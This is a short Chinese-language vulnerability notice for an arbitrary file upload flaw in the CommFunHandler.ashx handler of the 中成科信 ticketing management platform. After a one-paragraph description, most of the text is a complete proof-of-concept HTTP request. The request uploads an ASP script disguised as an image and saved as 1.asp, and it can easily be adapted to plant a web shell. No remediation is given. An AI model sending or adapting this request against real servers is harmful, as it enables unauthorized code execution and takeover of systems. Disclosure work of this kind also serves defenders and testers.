漏洞描述
文件上传漏洞发生在应用程序允许用户上传文件的功能中,如果上传功能未能正确地验证和限制上传文件的类型和内容,攻击者可能利用此漏洞上传恶意文件,如包含可执行代码的脚本文件,从而在服务器上执行任意命令,控制或破坏系统。
中成科信票务管理平台CommFunHandler.ashx任意文件上传漏洞
PoC代码
POST /SystemManager/Comm/CommFunHandler.ashx HTTP/1.1
Host:
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: keep-alive
Content-Length: 896
Content-Type: multipart/form-data; boundary=--------------------------354575237365372692397370
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
----------------------------354575237365372692397370
Content-Disposition: form-data; name="file"; filename="1.txt"
Content-Type: image/jpeg
<%
Response.Write("Success")
%>
----------------------------354575237365372692397370
Content-Disposition: form-data; name="fileName"
1.asp
----------------------------354575237365372692397370
Content-Disposition: form-data; name="Method"
UploadZoneImg
----------------------------354575237365372692397370
Content-Disposition: form-data; name="solutionNo"
----------------------------354575237365372692397370
Content-Disposition: form-data; name="siteNo"
1
----------------------------354575237365372692397370
Content-Disposition: form-data; name="showNo"
1
----------------------------354575237365372692397370
Content-Disposition: form-data; name="showingNo"
1
----------------------------354575237365372692397370--